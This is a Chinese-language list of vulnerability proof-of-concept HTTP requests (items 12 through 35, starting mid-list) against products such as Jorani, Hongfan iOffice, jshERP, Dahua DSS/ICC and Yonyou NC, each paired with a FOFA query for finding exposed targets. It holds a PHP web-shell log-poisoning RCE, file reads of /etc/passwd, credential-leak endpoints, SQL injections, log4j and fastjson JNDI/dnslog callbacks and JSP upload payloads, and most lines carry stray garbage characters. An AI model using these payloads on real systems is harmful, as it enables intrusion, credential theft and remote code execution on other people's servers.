3 v: X% S/ j PUpgrade-Insecure-Requests: 1$ d' ^! a# n$ Z$ [ `5 {) b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
% } y1 y: ~+ SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; @. S8 S7 x: d) e" s$ mAccept-Encoding: gzip, deflate
- L- A. t* F9 V, k8 V/ j9 Q6 e, S" z4 yAccept-Language: zh-CN,zh;q=0.9,en;q=0.8* Q& \5 w; r! k* t, W
Connection: close
" S1 J4 g/ Y z+ T5 ~
% r9 b! O2 W( q0 ^6 q5 K# o
F+ _, h" e9 G12. Jorani < 1.0.2 远程命令执行
& I1 B, x0 y9 M5 K: ]FOFA:title="Jorani"
0 v4 |% ?$ w D* w, K第一步先拿到cookie; i2 A. ]; ]/ u) O
GET /session/login HTTP/1.1$ f4 m/ u6 n/ W- I
Host: 192.168.190.30* Z1 G6 D# ^2 w7 t
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
7 Z; b. F$ \; l% J1 \Connection: close6 u# o) n- j2 c: m5 w9 \
Accept-Encoding: gzip$ u3 p& E2 l/ k. u9 F" `+ b2 {
; M& n' v( C7 w' M% ^ ~2 s& V; d$ ?9 M! E* s9 Z5 ?8 ? D
响应中csrf_cookie_jorani用于后续请求, a3 ^: P5 e$ o8 n0 t& e# [. N
HTTP/1.1 200 OK- L+ v: R2 N* z9 s _
Connection: close6 Z, |0 ]$ v' ]
Cache-Control: no-store, no-cache, must-revalidate) T! [9 N; @1 B0 u0 U, U0 `
Content-Type: text/html; charset=UTF-83 b# U, p- ^3 {3 H/ e: e+ i% e
Date: Tue, 24 Oct 2023 09:34:28 GMT$ v; N. u5 \- B" t
Expires: Thu, 19 Nov 1981 08:52:00 GMT4 S9 m- `) u0 f0 n+ ?
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
! P7 M# J$ ]" H+ k, zPragma: no-cache
' L& ?& ?* [3 u+ `* }+ y, a$ WServer: Apache/2.4.54 (Debian)
0 t% X' u: o# H9 pSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/- i! e4 [$ y$ `; Y. A5 \3 e
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly9 p# [" G! \2 C" S# N0 t, ]% }6 u
Vary: Accept-Encoding
7 X5 a! H/ i, y. c2 Z4 J
% c, B7 D4 ^3 t6 ~) e0 w% U9 h4 r# P% d9 s. V+ M
POST请求,执行函数并进行base64编码
0 D+ j7 t: I% m8 U" OPOST /session/login HTTP/1.1
) @$ g- i( d; r' a/ gHost: 192.168.190.305 H5 p6 i a: X0 }0 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
; ?0 h& p1 O$ B* Y6 a. OConnection: close1 q+ B7 D" j. W4 X
Content-Length: 252
$ t: n; t% Z Y0 r4 EContent-Type: application/x-www-form-urlencoded
/ k+ n. L. r& |7 \Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r* Q( N/ B# _9 {9 c( F! O6 n! h
Accept-Encoding: gzip9 C. p+ {( ^" A( W
G) G _# x+ o* Ncsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor& \5 }8 ~$ e, k: {
* E4 c- R6 B$ z5 x* ~5 ^" W$ [* m
/ |% C8 }: }' s) N1 n9 c9 {) h3 ~8 J* K" b6 m3 D7 |
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串- j# Z9 F7 f/ z: y" z
GET /pages/view/log-2023-10-24 HTTP/1.1
# j) _; U o( I& y8 G/ OHost: 192.168.190.30
% s: R9 _3 _- n) Z# PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
7 x ?5 Q7 g: w* e: NConnection: close: r+ c a4 I6 {6 H& ` n, v
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r& T+ z3 k s& R* c) _, o9 Y5 X% q
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
( E8 l) E0 y0 R& J" G; D" dX-REQUESTED-WITH: XMLHttpRequest
6 R4 S; m ]: T1 o5 Q( j6 y& r" w) BAccept-Encoding: gzip
( r% O7 f& X; A& n
. I: O. m. Q; \3 Y3 q/ P# D }9 W4 \* d' Z
13. 红帆iOffice ioFileDown任意文件读取
. n9 l/ ]- _$ I7 RFOFA:app="红帆-ioffice"
& }+ }. v5 |! k2 ]9 W! U6 M9 z' GGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1; h+ H/ J7 c# Z3 q3 f+ U
Host: x.x.x.x) v2 u+ r0 V( m1 b( s: g2 n& Q) @
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
% g( L4 s, L$ WConnection: close
% Q& d' b# U( Z. ]Accept: */*
- T) s: T Q- j# m9 CAccept-Encoding: gzip
. p* O. }! W8 m2 r M& A5 e
4 }/ G) E- c2 r% F/ o; ]7 f# f y
0 m& h4 N L1 N2 m14. 华夏ERP(jshERP)敏感信息泄露
5 U- H% K. T+ b2 vFOFA:body="jshERP-boot"8 E- S( l5 L- @1 C6 X( ]
泄露内容包括用户名密码) a0 E# U. M* s$ E: s. v; V
GET /jshERP-boot/user/getAllList;.ico HTTP/1.13 Y. u5 o, [( C) I" N4 h
Host: x.x.x.x+ c7 _' o% n" d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
5 f* U* S4 g. N1 ^1 \( RConnection: close
% i2 i* C" ~2 O- bAccept: */*( L& E+ A; U5 m
Accept-Language: en
4 n! f5 [. i. K: `9 k8 ~9 LAccept-Encoding: gzip
% Z6 i9 t6 n+ @
) t6 s' C' ^9 q( P3 W
0 Q" x# r7 s: K15. 华夏ERP getAllList信息泄露$ W- ` c" i8 J& C/ D( ]0 ?
CVE-2024-0490( M$ g$ _: ?1 T0 W
FOFA:body="jshERP-boot"
+ n# A; h0 Q4 j/ x6 ]" O" a泄露内容包括用户名密码
! q3 B7 a# G* }" gGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.18 u2 |0 h4 w9 e. h
Host: 192.168.40.130:100& X- Z* z* E1 T* N$ B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
9 S3 }1 n; e) OConnection: close% v* A2 j2 {/ H" v
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8& H' r6 [* d+ S( E
Accept-Language: en
, F. Q9 [$ k, B" f7 W6 I' zsec-ch-ua-platform: Windows$ M9 @' C( O7 e/ c8 Q2 b o
Accept-Encoding: gzip2 q4 o+ d% x( k% x' K# |" r& `
# T; s* j+ s; _8 h
1 V& ^" [4 {# H9 h7 L
16. 红帆HFOffice医微云SQL注入" d2 y" G( C& Y5 ~
FOFA:title="HFOffice"
, r( u: C* c, b8 |0 q/ t9 ypoc中调用函数计算1234的md5值
; X7 L ]5 h5 T% N8 PGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
* X+ N' {' O+ ^( E5 X3 \9 [Host: x.x.x.x; f8 V) t# @; b6 a
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36! @7 Z8 Z7 d% ?- @5 S
Connection: close
$ e( @! Y+ `4 I8 oAccept: */*
- x* P$ w' u/ ?Accept-Language: en
; J/ E, w0 k( m1 \Accept-Encoding: gzip
. v; ^6 _& F5 B1 r& {$ U" V! M6 V7 {
" W/ g5 C, O6 |3 I8 @4 D# g) ^
17. 大华 DSS itcBulletin SQL 注入
9 D2 i/ t/ m7 y$ A+ gFOFA:app="dahua-DSS"/ s0 I2 |: `6 ?+ V$ ^! }
POST /portal/services/itcBulletin?wsdl HTTP/1.1
# J/ k- r! \+ X# V3 C# @( ^ l8 ?5 o8 hHost: x.x.x.x
8 ^5 j* @- \4 Q8 r/ q6 jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 w3 m* m! o3 |, o X, k3 l; W- NConnection: close+ n9 F9 {1 {- t) b% {
Content-Length: 345: C' O8 R8 \3 S8 H
Accept-Encoding: gzip- b0 }- Y ]" }
0 f* H; O- g6 W A, H<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>, t( F% J5 p+ h: r. ^ e; k
<s11:Body>
& [8 x+ d; n1 Y2 e+ m <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>* F ~6 p3 z* B
<netMarkings>* N* \! U2 i) E7 |# s: ^, m
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
# m3 s! q5 N1 ?8 d </netMarkings>/ ^) \, \6 @' ~
</ns1:deleteBulletin>2 K, ?3 W9 w9 L2 ~; T
</s11:Body>
; t2 I$ L& f, M6 B' q6 r5 R9 k</s11:Envelope>7 u- ]" e' N1 F0 |% q- z
! Y8 P, f# Y/ l( p Z9 L# y5 H& C. F
; ]* J; l6 P7 S18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
! W# e7 Z! v+ u$ @' m2 CFOFA:app="dahua-DSS"
8 b8 ~" V; m8 T2 k! q# pGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1+ }9 @9 Y* Z2 u# h8 Y
Host: your-ip7 x* a) D2 h' n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- ^( w! }3 W- e1 d2 A$ w; ^& sAccept-Encoding: gzip, deflate* N* F' V. U, K3 e; [
Accept: */*1 _1 G+ _' a$ j2 V5 j
Connection: keep-alive
0 G+ ~& u5 J) z/ ^9 @1 x& Q1 U1 u. p. N1 v' m
. a5 z# m; Q) P$ O1 t
' ^' S+ O+ ], }) j4 Q5 i. U; Q
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
) U) v' D; r, W6 F4 v; bFOFA:app="dahua-DSS"
/ F. C: t" I }4 J7 C5 e& UGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
& N- F% [4 ^" F5 O5 F+ rHost:) U! K* j1 J9 i) {# X; o
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 h5 j9 [# I5 v% T
Accept-Encoding: gzip, deflate
" n+ v0 F5 B o" A* `) D) dAccept: */*
- T; P5 N) H @/ EConnection: keep-alive5 W- z( Y; ~- n
' e2 T: m0 M9 y$ ?: \3 `$ @) D
( L8 i3 `" R7 ?" p" d! m
20. 大华ICC智能物联综合管理平台任意文件读取4 O# t3 E0 m% i' ]" _; Y5 o
FOFA:body="*客户端会小于800*"
. f& H# p* r' l P. BGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1" \0 r; h$ ?$ C
Host: x.x.x.x0 o. S# M7 {8 P$ \$ s4 A' m0 ?
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' X: y0 f+ a z& C+ A) _
Connection: close' Z _' G7 m' {
Accept: */*; L4 c h" S" ~! J6 C. Y% [
Accept-Language: en
# y Q- q7 Z" y# z K) q( X; I4 UAccept-Encoding: gzip
" v" q2 T8 R8 O- [
/ e5 O. b r0 M" l' e7 W# G7 `) w9 P, z* m4 `7 B' j
21. 大华ICC智能物联综合管理平台random远程代码执行
% O$ i: h% l$ U8 l9 @FOFA:icon_hash="-1935899595") c1 I+ i( D r. S8 _$ c+ I4 C+ c
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
; w* {' O7 o1 G8 D* ] ?Host: x.x.x.x- j$ P0 I$ m' q9 X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 r) i+ K$ A7 g$ z- k* ~9 L
Content-Length: 161$ j# p, L* `9 v) u2 _& V0 ]
Accept-Encoding: gzip" M- V9 U5 T) G, Z" j4 B! O* k$ Z
Connection: close
8 K" b# z- q }0 cContent-Type: application/json;charset=utf-8 ^" S: ?/ k5 Y# B( C
+ W* ?/ }1 E8 G; s5 m+ S( H{
6 C# b+ r* [" b"a":{
& M f8 ]3 K- o, z "@type":"com.alibaba.fastjson.JSONObject",6 U5 H% t. B( d& d/ `3 g' l; C+ a
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}$ P2 M7 \& `& H4 E2 j G
}"". B- V( e. _5 s0 o
}" f' ^2 y4 g) n1 E0 M: j8 G
7 L, |3 P" a1 z# v1 l `
* O/ y" `2 J/ R0 p9 \22. 大华ICC智能物联综合管理平台 log4j远程代码执行! p4 ~, y) d, Z0 N
FOFA:icon_hash="-1935899595": y7 w8 K0 W2 s2 `$ i
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
' a2 W5 m# }5 C8 PHost: your-ip+ f% d; k/ f5 D! X; `6 C9 w5 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
0 R0 L2 V: D; V7 X; j4 z Z OContent-Type: application/json;charset=utf-8
6 S. j9 X" Z( X% }4 v) B
, Y1 v. ]6 V! P0 E! t. l+ ^{5 `% J- `/ o0 b- M9 z7 t- d- ~% w
"loginName":"${jndi:ldap://dnslog}"* ^- Q, p" Q3 F* T9 m4 `
}/ h4 t) w: Y& ]4 ?
; p8 a1 K; V$ q, f! K/ A8 b$ l$ W9 Z( U# ~* ]
, U4 X7 r2 \. P! F23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
+ t# w. N( W, L- lFOFA:icon_hash="-1935899595"- A8 G7 n7 j/ y+ g5 X2 Y
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1* {* U* H2 D) q7 V8 l$ K
Host: your-ip
& c; J5 [$ V" U+ r& U HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) H t% W& @8 A) h: u
Content-Type: application/json;charset=utf-8
- B& M! T2 b; f& RAccept-Encoding: gzip& R; H& T- j- B5 [4 o* T, M
Connection: close
* {% ?% d# v# @# L; {8 r" I5 n8 B$ |
{
) E& W' r$ p% D& \& {( t# U "a":{- k6 _1 x2 Y! j; `* h) T
"@type":"com.alibaba.fastjson.JSONObject",
4 T6 M5 e: v6 r) |) y+ D {"@type":"java.net.URL","val":"http://DNSLOG"}9 [- h9 y( L! W% ]' d
}""- k' l# f) E7 z) Y9 M5 |
}
( b( M% m2 t B4 F+ s% I0 c* z( R/ x: ^2 |' ?9 e; p9 u8 m
- I! v# X: K8 e) x
24. 用友NC 6.5 accept.jsp任意文件上传$ f( j; F. ?$ R/ _; g3 }
FOFA:icon_hash="1085941792"
; |4 w6 h) i% {POST /aim/equipmap/accept.jsp HTTP/1.19 @+ w7 ^9 w5 |& Y1 K2 d
Host: x.x.x.x0 r2 K% N; i5 j6 D }
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
" |0 W) n- n0 B. t9 eConnection: close1 P6 }1 }6 l. b" Y: \, J( z @
Content-Length: 449
7 X- f, h( M* F# z1 T. {, rAccept: */*! |" t7 s% r/ B5 z; o1 M8 H* \
Accept-Encoding: gzip" i4 i, G- X4 K" S+ s
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc% `4 C7 ` s% F+ d! _0 G: m
8 o0 _5 L: _4 g$ m. y
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
. P, K; j. n0 W, R% JContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"1 G& E& t/ }# Z
Content-Type: text/plain
, X t) S, E5 p7 m
" g6 m8 J2 k- d<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>( k! h$ m, ~( z5 f5 M a9 U3 Q
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
% L$ U& \: W: Z& m0 U' @6 W; VContent-Disposition: form-data; name="fname"4 s5 @7 P3 V+ k" g
1 X8 ^! M1 q; ? H\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
) `, f. a" p! W0 _ |" x-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
* e3 F+ y" V4 M2 o6 _7 g' V2 [7 m1 Q* }& h* k% U( i
- G; g, u$ a2 v7 p
25. 用友NC registerServlet JNDI 远程代码执行
+ |+ s9 D5 A5 n& p- W6 tFOFA:app="用友-UFIDA-NC"
% K" Y8 o9 u3 r) J$ S/ E8 f. Q. EPOST /portal/registerServlet HTTP/1.10 ?3 p$ @/ z7 ~6 q
Host: your-ip
) K b) ?8 h4 x5 Z+ F4 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.08 G5 U4 ?4 g, Z: ?# M& H/ v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9. s+ D" a V% ]7 q
Accept-Encoding: gzip, deflate1 K V! R6 M) K
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
# O2 S% M( a( K0 p& w: O0 [1 iContent-Type: application/x-www-form-urlencoded
% J" k; P( P% E8 _3 y% { S1 s: s% w; \# k+ l5 t
type=1&dsname=ldap://dnslog5 d" i' ~$ }* ?% z+ f W/ @( d
; Q8 }* p# T0 Z' v
& b8 ?& H' ], I6 l- _
6 C* o- @& F# w# E26. 用友NC linkVoucher SQL注入* T1 _1 u7 E9 h2 p& J0 Q, T
FOFA:app="用友-UFIDA-NC"+ W- t3 K& n# g# _
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
L$ s, s( _3 Q! lHost: your-ip
i" t$ v( o2 r1 X1 W" \' AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- E. f9 I6 n: l& ]
Content-Type: application/x-www-form-urlencoded
3 v# k* |( Z$ Z6 {! XAccept-Encoding: gzip, deflate* P& Y7 }% s! H: f. l& [9 f
Accept: */*# e: U* q& M: t
Connection: keep-alive4 F' L% \1 |& a, g5 N+ S' L) F. A% F; {
m- z; P" |7 Q9 Z5 }, Y# \" c- Y# G" x1 F+ O6 l% `
27. 用友 NC showcontent SQL注入0 z( V$ P$ D& s0 }4 x4 t
FOFA:icon_hash="1085941792"* s9 M/ S3 O+ T
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1& M d% i. u M2 Y% `9 r0 M# d& u% D
Host: your-ip1 ?9 j; m: n. Q& L# A) ^+ M0 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ l8 L2 e7 h) K1 u4 }
Accept-Encoding: identity- a+ T8 E6 E9 e
Connection: close
5 z5 k0 u1 R/ [+ @0 DContent-Type: text/xml; charset=utf-8$ \- [9 j2 p8 V2 h
5 o+ c8 Z+ e9 q) `# k& p6 ~: V
3 P1 L% G! ?6 D) y$ ?" M3 @: e
28. 用友NC grouptemplet 任意文件上传2 L( O1 u% `- Y0 W# _4 V9 I4 L
FOFA:icon_hash="1085941792"
5 M, E! A% g' F! G1 ~POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
; D5 @5 z0 B4 m$ d4 P* KHost: x.x.x.x
+ g* [) y+ ~. i' t1 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36: b0 ]( f1 y N' c) j9 h
Connection: close( l4 d* `* x/ s4 y2 _
Content-Length: 268+ Z* Y0 ?# I$ _& e) {
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
' T$ O* r& Z, E! ^4 [/ wAccept-Encoding: gzip7 f6 `2 l/ ^) Z: |
+ ]) U# p; m; N. o6 u2 E) z, u
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
6 x* P: u: U9 c. Q4 K$ g6 sContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"0 o) H4 a+ q& I; r- r$ X) y
Content-Type: application/octet-stream
0 L# k+ u) v, G- \) I) l
+ ]& S' b( i0 v* u! P<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
4 K C: T3 d8 W6 _. l------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
0 B& d9 }% \( {+ V4 _( z& W# K+ R8 a5 x: D/ w
8 l& P0 K6 H, B8 t8 _/uapim/static/pages/nc/head.jsp7 c, j4 G& ]" g9 n
5 J& k" ^" ^+ G" Y. W( c; k5 E29. 用友NC down/bill SQL注入
C5 [% r# o- W" G; w; D: |FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"# w) E6 n# J) i0 [
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1( X1 P# y9 T( V* j, o1 Y* M
Host: your-ip
5 o! s ^) }& x6 a% p$ z0 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
# |/ S$ l7 ^! l+ C4 B0 [" o9 DContent-Type: application/x-www-form-urlencoded
\( k; P1 X: V/ y6 m4 VAccept-Encoding: gzip, deflate7 i. y2 `; Y0 W1 x
Accept: */*
1 M% x0 ]) r4 H1 ^ {2 QConnection: keep-alive! k! q0 ~2 m8 J1 M, Q, {
9 @" k& s2 F0 H& d* b/ `
# _9 x# M/ x$ \" g( x3 R30. 用友NC importPml SQL注入" y; _0 G5 F u6 T
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"4 A6 g c! m: n7 a1 o% ]
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
9 I" k5 y4 P8 s) C3 J( hHost: your-ip8 p) d/ f1 U% a) p" F6 I# [3 D, B
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
2 Y& i& K5 |9 p9 F; F; SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.360 s; j1 P" Z' y# u! W
Connection: close4 o; e4 u' _- a1 B" ?
4 H$ O+ g, V; D1 A$ {) D. c
------WebKitFormBoundaryH970hbttBhoCyj9V$ v: L R7 p: W
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"3 U/ U* B! v9 j4 F4 p4 n" q' F
Content-Type: image/jpeg$ z& w' N" k. s0 D N- Z7 P
------WebKitFormBoundaryH970hbttBhoCyj9V--% v# V# f2 @! q! Z5 y
5 y5 }6 l0 k5 w3 U: h/ c5 c* H. i/ {" O" h/ j! [
31. 用友NC runStateServlet SQL注入
" L, `: l {3 q2 y8 Hversion<=6.5
( X8 X! i) I' G4 X' o8 y* lFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
6 U- B9 t+ l _' A M/ e! AGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
& {# O2 g3 v1 }7 @% D" pHost: host
- L2 m: r% R9 y, Q" eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36% K }5 e* D6 o/ L
Content-Type: application/x-www-form-urlencoded2 S. _: N5 [+ O* p( w$ X% c3 O
' b! P5 u( e2 w/ l" _6 T
) X, {2 L/ V Y' _
32. 用友NC complainbilldetail SQL注入2 x3 Y7 I' T( F) o# n+ V1 ~, h" o
version= NC633、NC65) p7 ]5 e( J2 F# h2 i& {
FOFA:app="用友-UFIDA-NC"1 I8 m, y& j6 K7 P$ k t
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
% T! t. K9 o' [Host: your-ip! g" t& V' z' v% t1 |' v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 W5 F" N7 b; CContent-Type: application/x-www-form-urlencoded3 \1 u8 o; Q* C- }* t
Accept-Encoding: gzip, deflate
" E3 K: B9 e( x7 y3 o7 iAccept: */*
2 q- A' N4 H9 ^# NConnection: keep-alive" z1 d4 i1 I" p* y) `8 s
# F p+ h! y9 z; h; T4 b, _" \; J, l: g2 {! }2 j* P7 u- D$ z
33. 用友NC downTax/download SQL注入; l% e$ |- V0 ]
version:NC6.5FOFA:app="用友-UFIDA-NC"6 {5 Q( \( g$ ` m( I8 n E1 f& o
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
* y7 ?7 q. x3 {Host: your-ip5 t0 j. g3 O# U/ L3 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36( @: X0 ~3 g" t& E( T+ ~. R8 D9 S
Content-Type: application/x-www-form-urlencoded% R0 ^- u! \. y- j
Accept-Encoding: gzip, deflate
$ b! E- t* C b9 ^: S& wAccept: */*( ?% [ O- O# `/ s5 `. r' q
Connection: keep-alive' T- X5 J, A- U
3 f2 T: a/ E, s K6 u5 }4 }
9 B$ h2 j; D' x& C7 n' L34. 用友NC warningDetailInfo接口SQL注入9 L5 M* P" F) V6 D" w2 \0 N
FOFA:app="用友-UFIDA-NC"
6 A) M7 r4 [) Z0 S3 S. k' N+ iGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
) O {2 V4 s$ k! f# B# S9 @Host: your-ip! ]3 L1 O1 i' |. k+ K# F2 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) y, P6 `7 I' |Content-Type: application/x-www-form-urlencoded3 F3 }! k, l8 f9 k
Accept-Encoding: gzip, deflate
8 o, `$ ?* U) T, v6 L+ MAccept: */*; I& I: f- i9 n3 C1 R) P
Connection: keep-alive Q( q v/ X, U, |1 H! G
9 a6 n* L; x5 l, @& m! t, r' A3 e6 ?) g. m
35. 用友NC-Cloud importhttpscer任意文件上传% A- h) z' d! |0 o' B; d3 o
FOFA:app="用友-NC-Cloud"
: @+ p5 w8 h* }1 K) FPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
; f8 K6 _8 z9 E SHost: 203.25.218.166:88886 n& ~, T" C0 }; F5 W- h
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info# R) J7 T% O4 d8 \5 L4 L! {
Accept-Encoding: gzip, deflate
2 a2 X; J) X, J$ y. GAccept: */*. P0 U6 K* x, _% c* H; S
Connection: close. I% H+ I0 a3 e; i4 P) Z0 c
